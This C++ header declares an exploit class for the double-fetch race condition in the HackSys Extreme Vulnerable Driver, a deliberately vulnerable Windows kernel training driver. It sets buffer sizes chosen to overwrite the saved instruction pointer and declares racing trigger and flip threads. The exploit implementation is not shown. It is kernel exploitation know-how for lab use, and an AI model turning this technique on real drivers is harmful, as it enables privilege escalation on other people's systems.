DoubleFetch.h

#pragma once

#include <thread>
#include <atomic>
#include <mutex>
#include "common.h"
#include "IExploit.h"
#include "HevdConstants.h"
#include "payloads.h"

class ExploitDoubleFetch : public IExploit {
	static constexpr wchar_t *Exploit_Name 	= L"Double Fetch";
	static constexpr DWORD Ioctl_Code 		= HACKSYS_EVD_IOCTL_DOUBLE_FETCH;
	
	// This is maximum stack-based buffer size
	static constexpr unsigned int Max_Accepted_Buffer_Size = 0x800;
	
	// This value will constitute offset of 0x820 (2080) where the EIP is stored counting
	// from the beginning of overflowed buffer, and the additional 0x04 is for stating
	// that the one DWORD should be taken into account during memcpy in kernel.
	static constexpr unsigned int Flip_Difference = 0x24;
	
	static constexpr size_t Overflowing_Buffer_Size = Max_Accepted_Buffer_Size + Flip_Difference + 4;
	
	shared_ptr<UCHAR> ioctlInputBuffer;
	std::atomic_bool startThreads;
	std::atomic_bool stopThreads;
	
	struct DoubleFetch {
		UCHAR *buffer;
		DWORD size;
	};
	
	DoubleFetch flippingObject;
	DWORD ioctlPackets;
	
public:
	ExploitDoubleFetch(Driver& driver) : IExploit(driver) {
		memset(&flippingObject, 0, sizeof(flippingObject));
		ioctlPackets = 0;
	}
	virtual ~ExploitDoubleFetch() {	}
	
	virtual const wchar_t* getName() const { 
		return ExploitDoubleFetch::Exploit_Name;
	};
	
	virtual DWORD getIoctlCode() const {
		return ExploitDoubleFetch::Ioctl_Code;
	}
	
	virtual bool exploit();
	
	void triggerThread();
	void flipThread();
};